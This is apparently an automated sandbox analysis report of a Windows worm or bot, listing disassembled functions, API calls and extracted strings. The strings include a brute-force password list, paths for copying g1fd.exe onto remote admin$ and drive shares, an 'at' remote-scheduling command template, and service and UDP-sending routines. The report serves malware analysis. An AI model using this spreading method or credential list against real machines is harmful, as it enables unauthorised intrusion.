Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Close$HandleService
String ID:
API String ID: 907781861-0
Opcode ID: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
Instruction ID: 1f8c146e6fe937cb65407d64c7b6e595c96462481ae191be37c374c023957cce
Opcode Fuzzy Hash: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
Instruction Fuzzy Hash: D9E00235C512699BCF72AF54CC8869DBA79AF00302F5501FAB10D781608B392FD0DE04

Non-executed Functions

Function 00406090 Relevance: 140.5, APIs: 46, Strings: 34, Instructions: 522
librarystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,6D0C6DE0), ref: 004060A4
6D0C6DE0.KERNEL32(00000000), ref: 004060AB
LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
6D0C6DE0.KERNEL32(00000000), ref: 004060C8
GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
memset.MSVCRT ref: 004060F2
_mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
_mbscpy.MSVCRT(0000005D,2000), ref: 00406283
_mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
_mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
_mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
_mbscpy.MSVCRT(0000005D,2008), ref: 00406345
_mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
_mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
_mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
_mbscpy.MSVCRT(0000005D,2012), ref: 00406406
_mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
sprintf.MSVCRT ref: 0040649C
_mbscpy.MSVCRT(0000005D,?), ref: 004064B3
lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
GetSystemInfo.KERNEL32(?), ref: 0040655F
memset.MSVCRT ref: 00406570
sprintf.MSVCRT ref: 004065B5
_mbscpy.MSVCRT(-00000003,?), ref: 004065CC
_mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00406666
__aulldiv.LIBCMT ref: 00406681
__aulldiv.LIBCMT ref: 0040668F
wsprintfA.USER32 ref: 004066B4
malloc.MSVCRT ref: 004066C9
GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
free.MSVCRT ref: 004066EB
malloc.MSVCRT ref: 004066F8
GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
strcmp.MSVCRT ref: 00406731
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
sprintf.MSVCRT ref: 004068CD
_mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7

Strings

8, xrefs: 004061E6
RegCloseKey, xrefs: 0040609A
P, xrefs: 00406463
X, xrefs: 0040613A
@, xrefs: 00406655
T, xrefs: 00406118
2000, xrefs: 00406278, 0040627B
GetVersionExA, xrefs: 004060B7
Win, xrefs: 00406489, 0040648F
%s %s %s%d, xrefs: 00406490
2003, xrefs: 004062D9, 004062DF
KVa7, xrefs: 00406946, 0040685E, 00406728
%d*%u%s, xrefs: 004065A9
Vista, xrefs: 00406318, 0040631B
MHz, xrefs: 00406594, 0040659A
KERNEL32.dll, xrefs: 004060BC
N, xrefs: 00406111
%u Gbps, xrefs: 004068C1
%u Mbps, xrefs: 004068F8
2008, xrefs: 00406337, 0040633D
%u MB, xrefs: 004066A8
~MHz, xrefs: 00406539
8.1, xrefs: 0040642A, 00406430
S, xrefs: 0040645C
z, xrefs: 0040677A
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 004064D4
0.0.0.0, xrefs: 00406723
2008R2, xrefs: 00406396, 0040639C
ADVAPI32.dll, xrefs: 0040609F
Find CPU Error, xrefs: 0040663F, 00406645
2012, xrefs: 004063F8, 004063FE
7, xrefs: 004061AD
P, xrefs: 00406141
KVa7, xrefs: 004066D9, 00406708, 00406953, 004066E7, 004066DC, 004066EA, 0040670B, 00406956

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: _mbscpy$Infosprintf$AdaptersLibraryLoadSystemTable__aulldivmallocmemset$??2@DefaultGlobalLanguageMemoryQueryStatusValuefreelstrcpystrcmpwsprintf
String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
API String ID: 2090821033-2163519892
Opcode ID: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
Opcode Fuzzy Hash: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69

Function 00402AD0 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 249librarysleepprocessCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00402AEC
6D0C6DE0.KERNEL32(00000000), ref: 00402AF5
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00402B04
6D0C6DE0.KERNEL32(00000000), ref: 00402B07
LoadLibraryA.KERNEL32(mpr.dll), ref: 00402B11
6D0C6DE0.KERNEL32(00000000,WNetAddConnection2A), ref: 00402B19
memset.MSVCRT ref: 00402B36
lstrcmp.KERNEL32(?,NULL), ref: 00402B46
sprintf.MSVCRT ref: 00402B64

Part of subcall function 00402A92: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00402AC1

sprintf.MSVCRT ref: 00402BA6
Sleep.KERNEL32(000000C8), ref: 00402BF5
memset.MSVCRT ref: 00402C09
sprintf.MSVCRT ref: 00402C1D
memset.MSVCRT ref: 00402C53
sprintf.MSVCRT ref: 00402C67
memset.MSVCRT ref: 00402C9D
sprintf.MSVCRT ref: 00402CB1
memset.MSVCRT ref: 00402CE7
sprintf.MSVCRT ref: 00402CFB
memset.MSVCRT ref: 00402D2D
sprintf.MSVCRT ref: 00402D41
GetLocalTime.KERNEL32(?), ref: 00402D6C
memset.MSVCRT ref: 00402D7B
sprintf.MSVCRT ref: 00402DA2
WinExec.KERNEL32(?,00000000), ref: 00402DAF
Sleep.KERNEL32(000007D0), ref: 00402DC4

Strings

\\%s\admin$\g1fd.exe, xrefs: 00402C17
E:\g1fd.exe, xrefs: 00402D06
CopyFileA, xrefs: 00402AE2
KERNEL32.dll, xrefs: 00402AE7
\\%s\E$\g1fd.exe, xrefs: 00402CF5
mpr.dll, xrefs: 00402B09
D:\g1fd.exe, xrefs: 00402CBC
KERNEL32.dll, xrefs: 00402AFC
\\%s\D$\g1fd.exe, xrefs: 00402CAB
C:\g1fd.exe, xrefs: 00402C72
WNetAddConnection2A, xrefs: 00402B13
\\%s\ipc$, xrefs: 00402BA0
\\%s\F$\g1fd.exe, xrefs: 00402D3B
admin$\, xrefs: 00402C28
NULL, xrefs: 00402B3E
\\%s\C$\NewArean.exe, xrefs: 00402C61
at \\%s %d:%d %s, xrefs: 00402D9C
lstrcpyA, xrefs: 00402AF7
"%s", xrefs: 00402B5E
F:\g1fd.exe, xrefs: 00402D4C

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: sprintf$memset$LibraryLoad$Sleep$ExecFileLocalModuleNameTimelstrcmp
String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$at \\%s %d:%d %s$lstrcpyA$mpr.dll
API String ID: 1199448054-2568294205
Opcode ID: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
Opcode Fuzzy Hash: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64

Function 00405244 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 86filelibrarystringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
6D0C6DE0.KERNEL32(00000000), ref: 00405261
FindResourceA.KERNEL32(?,?,?), ref: 00405272
LoadResource.KERNEL32(?,00000000), ref: 00405291
LockResource.KERNEL32(00000000), ref: 004052A9
wsprintfA.USER32 ref: 004052C4
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
CloseHandle.KERNEL32(00000000), ref: 00405326

Strings

SizeofResource, xrefs: 00405250
hra%u.dll, xrefs: 004052BE
kernel32.dll, xrefs: 00405255

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: FileResource$LoadWrite$CloseFindHandleLibraryLockPointerlstrlenwsprintf
String ID: SizeofResource$hra%u.dll$kernel32.dll
API String ID: 496033514-2774179399
Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4

Function 0040351A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00403E70,Defghi Klmnopqr Tuv), ref: 00403523
OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
DeleteService.ADVAPI32(00000000), ref: 0040354C
CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
CloseServiceHandle.ADVAPI32(00000000), ref: 00403556

Strings

Defghi Klmnopqr Tuv, xrefs: 0040352D

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpen$DeleteManager
String ID: Defghi Klmnopqr Tuv
API String ID: 204194956-1553144822
Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9

Function 004036C6 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON

Download Yara Rule

APIs

select.WS2_32(?,?,00000000,00000000,00000000), ref: 00403706
__WSAFDIsSet.WS2_32(?,00000001), ref: 0040371F
recv.WS2_32(?,?,?,00000000), ref: 00403738

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
Opcode Fuzzy Hash: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58

Function 004055BC Relevance: 126.2, APIs: 24, Strings: 48, Instructions: 204
librarysleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
6D0C6DE0.KERNEL32(00000000), ref: 004055E1
LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
6D0C6DE0.KERNEL32(00000000), ref: 004055F4
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
6D0C6DE0.KERNEL32(00000000), ref: 00405602
Sleep.KERNEL32(000001F4), ref: 00405663
LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
6D0C6DE0.KERNEL32(00000000), ref: 004056F2
LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
6D0C6DE0.KERNEL32(00000000), ref: 0040574D
LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
6D0C6DE0.KERNEL32(00000000), ref: 0040578D
exit.MSVCRT ref: 004057A7
wsprintfA.USER32 ref: 004057D2
CreateThread.KERNEL32(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
Sleep.KERNEL32(000001F4), ref: 00405806
WSAStartup.WS2_32(00000202,?), ref: 0040581E
CreateThread.KERNEL32(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
WSAStartup.WS2_32(00000202,?), ref: 00405838
CreateThread.KERNEL32(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
CloseHandle.KERNEL32 ref: 00405865
Sleep.KERNEL32(0000012C), ref: 00405883

Strings

a, xrefs: 00405763
r, xrefs: 004056DC
n, xrefs: 0040571F
Defghi Klmnopqr Tuv, xrefs: 00405609, 0040578F
x, xrefs: 0040577F
I, xrefs: 0040573F
t, xrefs: 00405723
e, xrefs: 0040576B
Get, xrefs: 00405703, 0040570A
WS2_32.dll, xrefs: 004055D3
h, xrefs: 0040572B
s, xrefs: 004056D0
t, xrefs: 004056C4
E, xrefs: 004056D8
e, xrefs: 004056C0
e, xrefs: 0040571B
T, xrefs: 00405727
d, xrefs: 0040573B
r, xrefs: 004056E8
r, xrefs: 00405717
a, xrefs: 004056CC
d, xrefs: 00405743
t, xrefs: 00405767
G, xrefs: 004056BC
L, xrefs: 004056C8
r, xrefs: 0040575B
KERNEL32.dll, xrefs: 00405689
r, xrefs: 004056E0
e, xrefs: 0040577B
C, xrefs: 00405752
e, xrefs: 0040575F
closesocket, xrefs: 004055CE
u, xrefs: 0040570F
RegisterServiceCtrlHandlerA, xrefs: 004055F6
t, xrefs: 00405777
o, xrefs: 004056E4
t, xrefs: 004056D4
r, xrefs: 00405713
ADVAPI32.dll, xrefs: 004055E3, 004055ED, 004055FB
e, xrefs: 00405733
hra%u.dll, xrefs: 004057CC
M, xrefs: 0040576F
C, xrefs: 00405706
r, xrefs: 0040572F
a, xrefs: 00405737
u, xrefs: 00405773
A, xrefs: 00405783
SetServiceStatus, xrefs: 004055E8

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CreateSleepThread$Startup$CloseHandleObjectSingleWaitexitwsprintf
String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
API String ID: 434866226-3768298475
Opcode ID: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
Opcode Fuzzy Hash: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A

Function 00405348 Relevance: 112.2, APIs: 21, Strings: 43, Instructions: 211
librarymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
6D0C6DE0.KERNEL32(00000000), ref: 0040536E
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
6D0C6DE0.KERNEL32(00000000), ref: 0040537C
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
6D0C6DE0.KERNEL32(00000000), ref: 0040538E
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
6D0C6DE0.KERNEL32(00000000), ref: 004053A0
memset.MSVCRT ref: 00405483
GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 0040551C
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405533
GlobalFree.KERNEL32(?), ref: 00405540
CloseHandle.KERNEL32(00000000), ref: 00405547
CloseHandle.KERNEL32(00000000), ref: 00405552
BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
GlobalFree.KERNEL32(?), ref: 004055AF

Strings

RegCloseKey, xrefs: 00405370
Defghi Klmnopqr Tuv, xrefs: 0040543F, 0040544A, 00405584, 0040558D
\, xrefs: 00405435
v, xrefs: 00405421
S, xrefs: 004053B9
S, xrefs: 004053B1
r, xrefs: 004053D9
Y, xrefs: 004053B5
KERNEL32.dll, xrefs: 00405395
u, xrefs: 004053D1
t, xrefs: 004053F5
t, xrefs: 0040540D
n, xrefs: 004053F1
r, xrefs: 004053D5
KERNEL32.dll, xrefs: 00405383
r, xrefs: 004053F9
o, xrefs: 004053ED
\, xrefs: 00405411
T, xrefs: 004053BD
l, xrefs: 00405401
c, xrefs: 00405429
t, xrefs: 004053E5
M, xrefs: 004053C5
e, xrefs: 004053DD
r, xrefs: 0040541D
C, xrefs: 004053E9
S, xrefs: 00405415
C, xrefs: 004053CD
RegQueryValueExA, xrefs: 0040535F
e, xrefs: 00405409
ImagePath, xrefs: 0040549F
e, xrefs: 00405419
i, xrefs: 00405425
\, xrefs: 004053C9
o, xrefs: 004053FD
e, xrefs: 0040542D
ADVAPI32.dll, xrefs: 0040535A, 00405364, 00405375
E, xrefs: 004053C1
S, xrefs: 00405405
s, xrefs: 00405431
n, xrefs: 004053E1
lstrcatA, xrefs: 00405390
lstrcpyA, xrefs: 0040537E

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoadResourceUpdate$Global$CloseFileFreeHandle$AllocBeginReadSizelstrlenmemset
String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
API String ID: 78893175-1497069993
Opcode ID: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
Opcode Fuzzy Hash: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79

Function 00402DD5 Relevance: 91.2, APIs: 8, Strings: 44, Instructions: 166
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E

gethostname.WS2_32(?,00000080), ref: 00402FBA
gethostbyname.WS2_32(?), ref: 00402FCF
memset.MSVCRT ref: 00402FFA
memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
memset.MSVCRT ref: 00403049
sprintf.MSVCRT ref: 0040306F
Sleep.KERNEL32(000000C8), ref: 00403098
WSACleanup.WS2_32 ref: 004030ED

Strings

password, xrefs: 00402E81
root, xrefs: 00402E35
user, xrefs: 00402E19
movie, xrefs: 00402F7F
%d.%d.%d.%d, xrefs: 00403069
1314520, xrefs: 00402F2B
NULL, xrefs: 00402F53
money, xrefs: 00402E58
woaini, xrefs: 00402F78
movie, xrefs: 00402E43
love, xrefs: 00402EDB
abc123, xrefs: 00402EB3
xpuser, xrefs: 00402E5F
caonima, xrefs: 00402F17
alex, xrefs: 00402DFD
enter, xrefs: 00402E6D
88888, xrefs: 00402EF9
yeah, xrefs: 00402E51
111, xrefs: 00402E8B
123456, xrefs: 00402E95
12345678, xrefs: 00402ED1
123, xrefs: 00402E27
guest, xrefs: 00402DF6
administrator, xrefs: 00402DE1, 00403075, 004030AF
home, xrefs: 00402E04
game, xrefs: 00402E20
test, xrefs: 00402EA9
root, xrefs: 00402F0D
hack, xrefs: 00402E66
test, xrefs: 00402DE8
time, xrefs: 00402E4A
asdfgh, xrefs: 00402F35
angel, xrefs: 00402F49
memory, xrefs: 00402EBD
admin, xrefs: 00402DEF
asdf, xrefs: 00402F67
123, xrefs: 00402F5D
5201314, xrefs: 00402F21
alex, xrefs: 00402F3F
bbbbbb, xrefs: 00402EE5
qwerty, xrefs: 00402E9F
baby, xrefs: 00402F71
home, xrefs: 00402EC7
love, xrefs: 00402E0B

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
API String ID: 2657193355-195746125
Opcode ID: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
Opcode Fuzzy Hash: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58

Function 00406DB0 Relevance: 65.1, APIs: 29, Strings: 8, Instructions: 379librarythreadnetworkCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
6D0C6DE0.KERNEL32(00000000), ref: 00406DD3
LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
6D0C6DE0.KERNEL32(00000000), ref: 00406DE4

Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
Part of subcall function 00406BD0: 6D0C6DE0.KERNEL32(00000000), ref: 00406BE2

Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
Part of subcall function 00406C10: 6D0C6DE0.KERNEL32(00000000), ref: 00406C23
Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30

socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
Sleep.KERNEL32(00000014), ref: 00406ECD
RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
